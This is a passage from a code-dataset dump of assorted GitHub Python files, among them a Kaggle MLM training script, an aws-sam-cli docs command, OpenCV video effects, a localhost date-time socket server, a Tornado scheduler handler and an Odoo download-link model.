model.load_weights(networkfile0)\n #from keras.models import load_model\n #model = load_model(networkfile0)\n\n # Save network to disc for each epoch\n checkpointer = ModelCheckpoint(filepath=networkfile, verbose=1)\n\n # Early stopping?\n from keras.callbacks import EarlyStopping\n usualCallback = EarlyStopping()\n fitCallback = EarlyStopping(monitor='loss', min_delta=0, patience=30)\n\n # Fit model\n if valsplit > 0:\n history = model.fit_generator(\n train_generator,\n steps_per_epoch=len(Y_train_c) // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=len(Y_validation_c) // batch_size,\n callbacks=[checkpointer, fitCallback]\n )\n else:\n 
history = model.fit_generator(\n train_generator,\n steps_per_epoch=len(Y_train_c) // batch_size,\n epochs=epochs,\n callbacks=[checkpointer, fitCallback]\n )\n\n\n #history = model.fit(X, Y, batch_size=batch_size, epochs=epochs, callbacks=[checkpointer, fitCallback], validation_split=valsplit)\n msg = \"Saving model \" + networkfile\n print(msg)\n model.save(networkfile)\n\n # Save training loss\n pathsave = os.path.join(networkdir, config.trainloss)\n print('Saving train loss: ' + pathsave)\n np.savetxt(pathsave, history.history['loss'], fmt='%s')\n\n # Save training cost function\n pathsave = os.path.join(networkdir, config.traincost)\n print('Saving train cost: ' + pathsave)\n np.savetxt(pathsave, history.history['dice_coefficient'], fmt='%s')\n\n if valsplit > 0:\n # Save validation loss\n pathsave = os.path.join(networkdir, config.valloss)\n print('Saving validation loss: ' + pathsave)\n np.savetxt(pathsave, history.history['val_loss'], fmt='%s')\n\n # Save validation cost function\n pathsave = os.path.join(networkdir, config.valcost)\n print('Saving validation cost: ' + pathsave)\n np.savetxt(pathsave, history.history['val_dice_coefficient'], fmt='%s')\n\n\n","repo_name":"ehodneland/RadioGenomicsEC","sub_path":"tools.python/trainUNet3D.py","file_name":"trainUNet3D.py","file_ext":"py","file_size_in_byte":16766,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"10027528295","text":"\nimport copy\nimport gc\nimport json\nimport math\nimport os\nimport pickle\nimport random\nimport re\nimport sys\nimport time\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nimport tokenizers\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport transformers\nfrom datasets import load_dataset\nimport wandb\nfrom iterstrat.ml_stratifiers import MultilabelStratifiedKFold\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GroupKFold, KFold, StratifiedKFold, train_test_split\nfrom torch.nn import Parameter\nfrom torch.optim import SGD, Adam, AdamW\nfrom torch.utils.data import DataLoader, Dataset\nfrom tqdm.auto import tqdm\nfrom transformers import (AutoConfig, AutoModel, AutoModelForMaskedLM, AutoTokenizer,\n DataCollatorForLanguageModeling, Trainer, TrainingArguments,\n get_cosine_schedule_with_warmup,\n get_linear_schedule_with_warmup)\n\n\nimport yaml\nimport shutil\nfrom attrdict import AttrDict\nimport logzero\n\nfrom utils import get_score, get_args, convert_dot_dict\nfrom engine import train_loop\nfrom process import process\n\nsys.path.append('./base_exp')\n\nwarnings.filterwarnings(\"ignore\")\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\n\nos.environ['TOKENIZERS_PARALLELISM'] = 'true'\n\ndef load_2021():\n competition_path = '../input/feedback-prize-2021/'\n train_df = pd.read_csv(competition_path + 'train.csv')\n test_df = pd.read_csv(competition_path + 'sample_submission.csv')\n dfs = [train_df, test_df]\n essay_texts = {}\n for i, phase in enumerate(['train', 'test']):\n base_path = competition_path + phase + '/'\n\n\n for filename in os.listdir(base_path):\n with open(base_path + filename) as f:\n text = f.readlines()\n full_text = ' '.join([x for x in text])\n essay_text = ' '.join([x for x in full_text.split()])\n essay_texts[filename[:-4]] = essay_text\n \n df = pd.Series(essay_texts).to_frame().reset_index().rename(columns={'index': 'id', 0: 'full_text'})\n print(df.head())\n return df\n\ndef load_2021_and_remove_duplicates():\n df_2021 = load_2021()\n print(f'2021 shape: {df_2021.shape}')\n df_fb3 = pd.read_csv('../input/feedback-prize-english-language-learning/train.csv')\n id_2021 = df_2021['id'].values.tolist()\n id_fb3 = df_fb3['text_id'].values.tolist()\n duplicates = set(id_2021) & set(id_fb3)\n print(f'Found {len(duplicates)} duplicates')\n df_2021 = df_2021[~df_2021['id'].isin(duplicates)].reset_index(drop=True)\n print(f'2021 shape after removing duplicates: {df_2021.shape}')\n return df_2021\n\n\n\ndef main():\n args = get_args()\n with open(args.config_path, 'r') as f:\n CFG = yaml.safe_load(f)\n debug = args.debug\n\n CFG = AttrDict(CFG)\n # print(cfg)\n # https://github.com/bcj/AttrDict/issues/34\n CFG._setattr('_sequence_type', list)\n\n if hasattr(CFG, 'output_dir'):\n exp_name = CFG.output_dir.split('/')[-2]\n else:\n exp_name = CFG.output_dir.value.split('/')[-2]\n\n if not debug:\n wandb.init(project='mlm', entity='ktm98',\n config=CFG, name=f'{exp_name}')\n CFG = AttrDict(convert_dot_dict(dict(wandb.config)))\n CFG._setattr('_sequence_type', list)\n wandb.run.log_code(\".\")\n print(type(CFG))\n \n os.makedirs(CFG.output_dir, exist_ok=True)\n\n shutil.copyfile(args.config_path, CFG.output_dir+'params.yml')\n\n LOGGER = logzero.setup_logger(\n logfile=CFG.output_dir+'train.log', level=20, fileLoglevel=20)\n\n device = torch.device('cuda' if 
torch.cuda.is_available() else 'cpu')\n\n\n train_df = pd.read_csv('../input/feedback-prize-english-language-learning/train.csv')\n test_df = pd.read_csv('../input/feedback-prize-english-language-learning/test.csv')\n submission_df = pd.read_csv('../input/feedback-prize-english-language-learning/sample_submission.csv')\n\n if CFG.use_2021:\n train_df_2021 = load_2021()\n train_df = pd.concat([train_df, train_df_2021], axis=0)\n\n train_df = process(train_df)\n\n if debug:\n train_df = train_df.head(100)\n\n train_text_list, val_text_list = train_test_split(train_df['full_text'].values, test_size=0.25, random_state=CFG.seed)\n\n tokenizer = AutoTokenizer.from_pretrained(CFG.model)\n\n if CFG.add_new_token:\n new_tokens = ['STUDENT_NAME', 'PROPER_NAME', 'Generic_Name', 'Generic_School', 'LOCATION_NAME', 'OTHER_NAME', 'RESTAURANT_NAME',\n 'TEACHER_NAME', 'STORE_NAME', 'LANGUAGE_NAME', 'Generic_City', '']\n tokenizer.add_special_tokens({'additional_special_tokens': new_tokens})\n\n\n tokenizer.save_pretrained(CFG.output_dir+'tokenizer/')\n CFG.tokenizer = tokenizer\n\n \n # =============== mlm ===============\n mlm_train_json_path = CFG.output_dir + f'train_mlm.json'\n mlm_valid_json_path = CFG.output_dir + f'valid_mlm.json'\n\n for json_path, list_ in zip([mlm_train_json_path, mlm_valid_json_path],\n [train_text_list, val_text_list]):\n with open(str(json_path), 'w') as f:\n for sentence in list_:\n row_json = {'text': sentence}\n json.dump(row_json, f)\n f.write('\\n')\n datasets = load_dataset(\n 'json',\n data_files={'train': str(mlm_train_json_path),\n 'valid': str(mlm_valid_json_path)},\n )\n\n def tokenize_function(examples):\n return tokenizer(examples[\"text\"], max_length=CFG.max_len)\n\n tokenized_datasets = datasets.map(\n tokenize_function,\n batched=True,\n num_proc=1,\n remove_columns=[\"text\"],\n batch_size=CFG.batch_size)\n data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm_probability=CFG.mlm_probability)\n config = AutoConfig.from_pretrained(CFG.model, output_hidden_states=True)\n model = AutoModelForMaskedLM.from_pretrained(CFG.model, config=config)\n\n\n training_args = TrainingArguments(\n output_dir=CFG.output_dir,\n evaluation_strategy=\"epoch\",\n learning_rate=CFG.lr,\n weight_decay=CFG.weight_decay,\n save_strategy='no',\n per_device_train_batch_size=CFG.batch_size,\n num_train_epochs=CFG.epochs,\n # report_to=\"wandb\",\n run_name=exp_name,\n logging_dir=CFG.output_dir + 'logs/',\n lr_scheduler_type=CFG.scheduler,\n warmup_ratio=CFG.warmup_ratio,\n fp16=True,\n logging_steps=500,\n gradient_accumulation_steps=CFG.gradient_accumulation_steps,\n seed=CFG.seed,\n gradient_checkpointing=CFG.gradient_checkpointing,\n )\n\n trainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=tokenized_datasets[\"train\"],\n eval_dataset=tokenized_datasets['valid'],\n data_collator=data_collator,\n # optimizers=(optimizer, scheduler)\n )\n\n trainer.train()\n trainer.model.save_pretrained(CFG.output_dir + f'mlm_{CFG.model.split(\"/\")[-1]}')\n\n\nif __name__ == '__main__':\n main()","repo_name":"ktm98/kaggle-feedback-prize-3","sub_path":"base_exp/mlm.py","file_name":"mlm.py","file_ext":"py","file_size_in_byte":7180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"16808813797","text":"import functools\nimport os\nimport sys\nfrom typing import Callable, List\n\nfrom click import echo\n\nfrom samcli.cli.main import common_options, print_cmdline_args\nfrom samcli.commands.docs.exceptions import InvalidDocsCommandException\nfrom samcli.lib.docs.browser_configuration import BrowserConfiguration, BrowserConfigurationError\nfrom samcli.lib.docs.documentation import Documentation\nfrom samcli.lib.telemetry.metric import track_command\n\nCOMMAND_NAME = \"docs\"\n\nSUCCESS_MESSAGE = \"Documentation page opened in a browser.\"\nERROR_MESSAGE = \"Failed to open a web browser. Use the following link to navigate to the documentation page: {URL}\"\n\n\nclass DocsCommandContext:\n def get_complete_command_paths(self) -> List[str]:\n \"\"\"\n Get a list of strings representing the fully qualified commands invokable by sam docs\n\n Returns\n -------\n List[str]\n A string list of commands including the base command\n \"\"\"\n return [self.base_command + \" \" + command for command in self.all_commands]\n\n @property\n def command_callback(self) -> Callable[[str], None]:\n \"\"\"\n Returns the callback function as a callable with the sub command string\n \"\"\"\n impl = CommandImplementation(command=self.sub_command_string)\n return functools.partial(impl.run_command)\n\n @property\n def all_commands(self) -> List[str]:\n \"\"\"\n Returns all the commands from the commands list in the docs config\n \"\"\"\n return list(Documentation.load().keys())\n\n @property\n def sub_command_string(self) -> str:\n \"\"\"\n Returns a string representation of the sub-commands\n \"\"\"\n return \" \".join(self.sub_commands)\n\n @property\n def sub_commands(self) -> List[str]:\n \"\"\"\n Returns the filtered command line arguments after \"sam docs\"\n \"\"\"\n return self._filter_arguments(sys.argv[2:])\n\n @property\n def base_command(self) -> str:\n \"\"\"\n Returns a string representation of the base command (e.g \"sam docs\")\n\n click.get_current_context().command_path returns the entire command by the time it\n gets to the leaf node. We just want \"sam docs\" so we extract it from that string\n \"\"\"\n return f\"sam {COMMAND_NAME}\"\n\n @staticmethod\n def _filter_arguments(commands: List[str]) -> List[str]:\n \"\"\"\n Take a list of command line arguments and filter out all flags\n\n Parameters\n ----------\n commands: List[str]\n The command line arguments\n\n Returns\n -------\n List of strings after filtering it all flags\n\n \"\"\"\n return list(filter(lambda arg: not arg.startswith(\"-\"), commands))\n\n\nclass CommandImplementation:\n def __init__(self, command: str):\n \"\"\"\n Constructor used for instantiating a command implementation object\n\n Parameters\n ----------\n command: str\n Name of the command that is being executed\n \"\"\"\n self.command = command\n self.docs_command = DocsCommandContext()\n\n @track_command\n @print_cmdline_args\n @common_options\n def run_command(self):\n \"\"\"\n Run the necessary logic for the `sam docs` command\n\n Raises\n ------\n InvalidDocsCommandException\n \"\"\"\n if self.docs_command.sub_commands and self.command not in self.docs_command.all_commands:\n raise InvalidDocsCommandException(\n f\"Command not found. 
Try using one of the following available commands:{os.linesep}\"\n f\"{os.linesep.join([command for command in self.docs_command.get_complete_command_paths()])}\"\n )\n browser = BrowserConfiguration()\n documentation = Documentation(browser=browser, command=self.command)\n try:\n documentation.open_docs()\n except BrowserConfigurationError:\n echo(ERROR_MESSAGE.format(URL=documentation.url), err=True)\n else:\n echo(SUCCESS_MESSAGE)\n","repo_name":"aws/aws-sam-cli","sub_path":"samcli/commands/docs/command_context.py","file_name":"command_context.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":6381,"dataset":"github-code","pt":"69"}
+{"seq_id":"7454475987","text":"# 此实例示意文件缓冲区的作用及清除方法\nfw=open(\"myflush.txt\",'w')\n\nfw.write(\"hello\") #此处执行的write操作没有真正写在磁盘上\nimport time\nwhile 1: #进入死循环\n time.sleep(0.1)\n print(time.time())\n fw.write('A'*1000+'\\n')\n\nfw.close()","repo_name":"suprviserpy632157/zdy","sub_path":"ZDY/Jan_all/pythonbase/January0116/afternoon/flush2.py","file_name":"flush2.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"21790010537","text":"import math\nimport matplotlib.pyplot as plt\n\n#ввод входных параметров\nK=float(input('Введите K: ')) #k=0,1 или бесконечность\nfik=float(input('Введите fik: ')) #fik=0 - проекция Уэтча,fik=45 - проекция Голла\n\n#создание текстового файла для записи пар значений прямоугольных координат узлов сетки\ntabl=open('pryamaya_10_145.txt','w')\ntabl.write('X;Y\\n')\n\n#описание констант\nR=6371116\nC=K+math.cos(fik*math.pi/180)\nalpha=R*math.cos(fik*math.pi/180)\n\n#расчёт и запись значений прямоугольных координат узлов сетки\nfor fi in range(-90,91,10):\n x=C*R*(math.sin(fi*math.pi/180)/(K+math.cos(fi*math.pi/180)))\n for lyambda in range(-180,181,10):\n y=alpha*lyambda*math.pi/180\n plt.scatter([lyambda],[fi], s=300)\n plt.gcf().set_size_inches((17.63, 10.88))\n tabl.write(str(x)+';'+str(y)+'\\n')\n\ntabl.close()\n","repo_name":"verlenetyree/PCproject-toolbox","sub_path":"sources/pcp_transformation/pryamaya.py","file_name":"pryamaya.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70991030940","text":"import cv2\nfrom ffpyplayer.player import MediaPlayer\nfrom ffpyplayer.writer import MediaWriter\nimport numpy as np\nimport scipy.fft as fft\nimport math\nimport random\nimport os\nvideo_path = 'movie/seal.mp4'\n\ndef changefirst(frame):\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)#顏色轉換->GRAY\n gray = cv2.medianBlur(gray, 7)#中值模糊\n edges = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 9, 10)#域值\n color = cv2.bilateralFilter(frame, 12, 250, 250)\n frame = cv2.bitwise_and(color, color, mask=edges)\n return frame\n\ndef changeRGB(frame,lastbinary,flag):\n frame = changefirst(frame)\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)#顏色轉換->GRAY\n gray = cv2.medianBlur(gray, 7)#中值模糊\n edges = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 9, 10)#域值\n gray = cv2.bitwise_not(gray,mask=edges)\n ret, binary = cv2.threshold(gray,127,255,cv2.THRESH_BINARY_INV)\n \n if flag != False:\n binarydiff = cv2.absdiff(binary,lastbinary)\n lastbinary = binary\n if flag != False:\n binary = binarydiff\n contours, hierarchy = cv2.findContours(binary,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n randomList=random.sample(range(0,255),3)\n if len(contours) > 400 :\n for i in range(400):\n frameRGB = cv2.drawContours(frame,contours,i,(randomList[0],randomList[1],randomList[2]),-1)\n elif len(contours) > 150:\n for i in range(150):\n frameRGB = cv2.drawContours(frame,contours,i,(randomList[0],randomList[1],randomList[2]),-1)\n elif len(contours) > 5:\n for i in range(5):\n frameRGB = cv2.drawContours(frame,contours,i,(randomList[0],randomList[1],randomList[2]),-1)\n frame = cv2.bitwise_and(frame,frameRGB)\n return frame,lastbinary\n\ndef floodfill(frame,height,width):\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)#顏色轉換->GRAY\n gray = cv2.medianBlur(gray, 7)#中值模糊\n mask=np.zeros([height+2 , width+2],np.uint8)\n loDiff = 20\n upDiff = 30\n cv2.floodFill(gray,mask,(int(height/2),int(width/2)),(255,0,0),(loDiff,loDiff,loDiff),(upDiff,upDiff,upDiff))\n #frame=cv2.bitwise_not(frame,msk)\n return frame\n\n\ndef readVideo_RGB(filename = 'movie/output_quokka.mp4'):\n video = cv2.VideoCapture(video_path)\n #player = MediaPlayer(video_path)\n fps = video.get(cv2.CAP_PROP_FPS)\n frame_nums = int(video.get(cv2.CAP_PROP_FRAME_COUNT))\n width = int(video.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))\n out = cv2.VideoWriter(filename, 0x7634706d, fps, (width, height))\n fps = int(fps)\n flag = True\n lastbinary= np.array\n for frame_idx in range(frame_nums):\n ret, frame = video.read()\n if not ret:\n print(\"Can't not receive frame\")\n break\n frame=floodfill(frame,height,width)\n if frame_idx == 0:\n flag = False\n else:\n flag = True\n frame,lastbinary = changeRGB(frame,lastbinary,flag)\n # frame = cv2.flip(frame, 1)\n #audio_frame, val = player.get_frame()\n out.write(frame)\n video.release()\n out.release()\n cv2.destroyAllWindows()","repo_name":"DrXiao/ImageProcessingProject","sub_path":"src/effect_quokka.py","file_name":"effect_quokka.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6517384949","text":"#!/usr/bin/env python\n\ntry:\n with open('DATA/wombats.txt') as wombats_in:\n for raw_line in wombats_in:\n print(raw_line.rstrip())\n\nexcept FileNotFoundError as err:\n print(err)\n\nvalues = 5.1, 3.9, 0.0, 4.7, 'abc', 2.8\n\nfor v in values:\n try:\n result = 23.2 / float(v)\n except ZeroDivisionError as err:\n print(err)\n exit()\n except (ValueError, TypeError) as err:\n print(err)\n except Exception as err:\n print(\"Whoa! did not expect:\", err)\n else:\n print(result)\n finally:\n print(\"v is\", v)\n\n\n\n\n","repo_name":"netflow0/20190506Bettis","sub_path":"error_handling.py","file_name":"error_handling.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30225468559","text":"#!/usr/bin/python\nimport os\nimport sys\n\ndata_name = sys.argv[1]\n\ncdna_list = dict()\ncdna_h = ''\nf_cdna = open('%s.cdna_full.fa'%data_name,'r')\nfor line in f_cdna:\n if( line.startswith('>') ):\n cdna_h = line.strip().lstrip('>')\n cdna_list[cdna_h] = []\n else:\n cdna_list[cdna_h].append( line.strip() )\nf_cdna.close()\n\ncds_list = dict()\ncds_h = ''\nf_cds = open('%s.cds_full.fa'%data_name,'r')\nfor line in f_cds:\n if( line.startswith('>') ):\n cds_h = line.strip().lstrip('>')\n cds_list[cds_h] = []\n else:\n cds_list[cds_h].append( line.strip() )\nf_cds.close()\n\nprot_list = dict()\nprot_h = ''\nf_prot = open('%s.prot_full.fa'%data_name,'r')\nfor line in f_prot:\n if( line.startswith('>') ):\n prot_h = line.strip().lstrip('>')\n prot_list[prot_h] = []\n else:\n prot_list[prot_h].append( line.strip() )\nf_prot.close()\n\nprot_seq = dict()\nfor tmp_h in prot_list.keys():\n tmp_seq = ''.join(prot_list[tmp_h])\n if( tmp_seq.find('M') >= 0 ):\n tmp_M_pos = tmp_seq.index('M')\n tmp_seq = tmp_seq[tmp_M_pos:]\n\n if( not prot_seq.has_key(tmp_seq) ):\n prot_seq[tmp_seq] = []\n prot_seq[tmp_seq].append( tmp_h )\n\nf_cdna_out = open('%s.cdna_full_NR.fa'%data_name,'w')\nf_cds_out = open('%s.cds_full_NR.fa'%data_name,'w')\nf_prot_out = open('%s.prot_full_NR.fa'%data_name,'w')\nf_log_out = open('%s_full_NR.log'%data_name,'w')\nfor tmp_pseq in prot_seq.keys():\n longest_nseq = ''\n longest_cds_seq = ''\n longest_h_prot = ''\n longest_h_cdna = ''\n longest_h_cds = ''\n for tmp_h in prot_seq[tmp_pseq]:\n tmp_h_cdna = 'c.%s'%('.'.join(tmp_h.split('.')[1:]))\n tmp_h_cds = 'cds.%s'%('.'.join(tmp_h.split('.')[1:]))\n tmp_nseq = ''.join(cdna_list[tmp_h_cdna])\n tmp_cds_seq = ''.join(cds_list[tmp_h_cds])\n if( len(tmp_nseq) > len(longest_nseq) ):\n longest_h_prot = tmp_h\n longest_h_cdna = tmp_h_cdna\n longest_h_cds = tmp_h_cds\n longest_nseq = tmp_nseq\n longest_cds_seq = tmp_cds_seq\n \n f_cdna_out.write('>%s\\n%s\\n'%(longest_h_cdna,longest_nseq))\n f_cds_out.write('>%s\\n%s\\n'%(longest_h_cds,longest_cds_seq))\n if( tmp_pseq.startswith('M') ):\n f_prot_out.write('>M%s\\n%s\\n'%(longest_h_prot,tmp_pseq))\n else:\n f_prot_out.write('>%s\\n%s\\n'%(longest_h_prot,tmp_pseq))\n f_log_out.write('%s\\t%s\\n'%(longest_h_prot, ';;'.join(prot_seq[tmp_pseq])))\nf_prot_out.close()\nf_cdna_out.close()\nf_cds_out.close()\nf_log_out.close()\n","repo_name":"marcottelab/HTseq-toolbox","sub_path":"final/make-cdna_prot_NR.py","file_name":"make-cdna_prot_NR.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"74282685661","text":"import socket\nimport datetime\n\n# Define host and port\nHOST = '127.0.0.1'\nPORT = 12345\n\n# Create socket object\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Bind socket to a specific address and port\nserver_socket.bind((HOST, PORT))\n\n# Listen for incoming connections\nserver_socket.listen()\n\nprint(f'Server listening on {HOST}:{PORT}')\n\n# Accept incoming connections\nclient_socket, address = server_socket.accept()\n\nprint(f'Connected by {address}')\n\n# Get the current date and time\nnow = datetime.datetime.now()\n\n# Send the date and time to the client\nclient_socket.send(now.strftime('%Y-%m-%d %H:%M:%S').encode())\n\n# Close the socket\nclient_socket.close()\nserver_socket.close()\n\n","repo_name":"OHMPRAKASHD/CN_SERVER_CLIENT_DATE_TIME","sub_path":"date time/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"28186623408","text":"'''\ndp를 2차원 배열로 두가지 값을 저장해서 풀었다.\ndp[i][0] = i번째 까지의 값을 더한 값. 음수가 됬다면 0으로 초기화.\ndp[i][1] = i번째 까지의 최댓값\n해당 점화식을 구하고 문제를 제출했으나 오답처리가 됬다.\n점화식에 대한 오류를 찾아봤는데 반례를 찾지못한체 \n삽질을 거듭한 끝에 모든 수가 음수였을때 발생하는 오류라는 것을 발견했다.\n해당 반례를 처리해주고 끝.\n문제를 풀다보니 이런 사소한 실수를 놓치는 경우가 많은것 같다.\n이번 경우에도 점화식을 구하는것은 쉬웠으나\n저 실수 때문에 시간이 배 이상이 걸렸다.\n반성\n'''\n\nimport sys\n\ndef read():\n return sys.stdin.readline().strip()\n\n\nn = int(read())\n\nnum = list(map(int, read().split()))\ndp = [[0, 0] for i in range(n)]\n\ndp[0][0] = num[0]\ndp[0][1] = num[0]\n\nfor i in range(1, n):\n dp[i][0] = max(dp[i-1][0] + num[i], 0) # 마지막 수를 포함. 음수라면 0으로\n dp[i][1] = max(dp[i-1][1], dp[i][0]) # 최대수\n\nmaxnum = max(num)\n\nif maxnum < 0:\n print(maxnum)\nelse:\n print(dp[n-1][1])\n","repo_name":"jinukix/Algorithm_py","sub_path":"BAEKJOON/1912 연속합.py","file_name":"1912 연속합.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"37859215173","text":"import tornado.web\nfrom tornado.escape import json_encode\nfrom base import BaseHandler\nfrom models.optimize_configuration import optimizeConfigurationModel\nfrom apscheduler.schedulers.tornado import TornadoScheduler\nfrom apscheduler.executors.pool import ThreadPoolExecutor\n# import logging\n\nscheduler = None\n\n# 初始化\ndef init_scheduler():\n global scheduler\n executor = ThreadPoolExecutor(max_workers=20) # 最多20个线程同时执行\n scheduler = TornadoScheduler()\n scheduler.add_executor(executor)\n scheduler.start()\n print('[Scheduler Init]APScheduler has been started')\n\n # logging.basicConfig()\n # logging.getLogger('apscheduler').setLevel(logging.DEBUG)\n\nclass TeskFlowHandler(BaseHandler, tornado.web.RequestHandler):\n init_scheduler()\n\n def get(self):\n sss = scheduler.get_jobs()\n print(sss)\n\n def task11(self):\n print('12323232323')\n # print(logging.DEBUG)\n\n def post(self):\n tt = scheduler.add_job(self.task11, 'cron', second=2, id=\"0001\")\n print(tt.id)\n # print('task')\n\n def put(self):\n id = self.get_argument(\"id\")\n oper = self.get_argument(\"operType\")\n rtn = scheduler.get_job(job_id=id)\n print(rtn)\n if rtn:\n if oper == 0:\n scheduler.pause_job(job_id=id)\n print('暂停成功')\n if oper == 1:\n scheduler.resume_job(job_id=id)\n print('恢复成功')\n else:\n print('未找到')\n\n def delete(self):\n id = self.get_argument(\"id\")\n rtn = scheduler.get_job(job_id=id)\n print(rtn)\n if rtn:\n scheduler.remove_job(id)\n print('移除成功')\n else:\n print('未找到')\n\n\n # user_id = self.get_argument(\"user_id\")\n # username = self.get_argument(\"username\")\n # oper_type = self.get_argument(\"oper_type\")\n # optimizeConfigurations = optimizeConfigurationModel.get_current(user_id, username, oper_type)\n # self.headers = {\n # \"User-Agent\": \"Mozilla/5.0 (Linux; Android 8.1.0; ALP-AL00 Build/HUAWEIALP-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/63.0.3239.83 Mobile Safari/537.36 T7/10.13 baiduboxapp/10.13.0.11 (Baidu; P1 8.1.0)\"\n # }\n # if optimizeConfigurations[1] == '':\n # pass\n # else:\n # html = requests.get(optimizeConfigurations[2], headers=self.headers)\n # selector = etree.HTML(html.text)\n # links = selector.xpath('//a/@href')\n # self.write(json_encode(optimizeConfigurations))\n\n\n\n # scheduler.get_job(job_id=\"0001\")\n # scheduler.shutdown()","repo_name":"happyguydev/awslsource","sub_path":"web_server/handlers/task_flow.py","file_name":"task_flow.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"5974462255","text":"#\n# Example file for working with conditional statements\n#\n\ndef main():\n x, y = 1000, 100\n\n if x < y:\n st = \"you are small\"\n elif x == y:\n st = \"you are equal\"\n\n\n else:\n st = \"greater than\"\n print(st)\n\n # conditional flow uses if, elif, else\n\n # conditional statements let you use \"a if C else b\"\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"scorpiopd/allpython","sub_path":"Files/Ch2/conditionals_start.py","file_name":"conditionals_start.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31544442742","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='fetch',\n version='0.0.4',\n author='Gergely Dervarics',\n author_email='dervarics@gmail.com',\n description='http request wrapper with simple caching',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/greg76/fetch',\n project_urls = {\n \"Bug Tracker\": \"https://github.com/greg76/fetch/issues\"\n },\n license='MIT',\n packages=setuptools.find_packages(),\n install_requires=[],\n)","repo_name":"greg76/fetch","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39235755368","text":"import settings\n\nclass State(object):\n \n def __init__(self, row):\n ''' Initialize the state.'''\n \n self.date = float(row[0])\n self.oil_spot = float(row[1])\n self.oil_futures = float(row[2])\n self.oil_futures_rs = float(row[3])\n self.commodities = row[4:]\n self.ma_20 = None\n self.ma_120 = None\n \n def executeStrategy(self, strategy):\n strategy.execute(self)\n","repo_name":"MichelleArk/Quantathon","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30391446935","text":"# -*- coding: utf-8 -*-\n\nimport uuid\nfrom datetime import datetime, timedelta\n\nfrom werkzeug.urls import url_encode\n\nfrom odoo import api, fields, models\n\n\nclass MusicDownload(models.Model):\n\n _name = \"oomusic.download\"\n _rec_name = \"access_token\"\n _order = \"expiration_date desc, id desc\"\n _description = \"Download links\"\n\n def _default_access_token(self):\n return uuid.uuid4().hex\n\n def _default_expiration_date(self):\n return fields.Date.to_string((datetime.now() + timedelta(days=30)).date())\n\n res_model_id = fields.Many2one(\n \"ir.model\",\n \"Related Document Model\",\n ondelete=\"cascade\",\n help=\"Model of the followed resource\",\n )\n res_model = fields.Char(\n string=\"Document Model\", related=\"res_model_id.model\", store=True, readonly=True\n )\n res_id = fields.Integer(\n string=\"Document\", required=True, help=\"Identifier of the downloaded object\"\n )\n access_token = fields.Char(\n \"Security Token\",\n index=True,\n default=lambda s: s._default_access_token(),\n help=\"Access token to access the files\",\n )\n note = fields.Char(\"Comment\")\n flatten = fields.Boolean(\n \"Flatten\", help=\"If activated, all tracks will be in the root folder of the ZIP file.\"\n )\n expiration_date = fields.Date(\n \"Expiration Date\",\n index=True,\n default=lambda s: s._default_expiration_date(),\n help=\"The link will be deactivated after this date.\",\n )\n min_delay = fields.Integer(\n \"Minimum Delay\", default=60, help=\"Minimum delay in seconds between consecutive accesses.\"\n )\n access_date = fields.Datetime(\"Last Access Date\")\n url = fields.Char(\n \"URL\",\n compute=\"_compute_url\",\n help=\"Send this URL to your contacts so they will download the tracks.\",\n )\n expired = 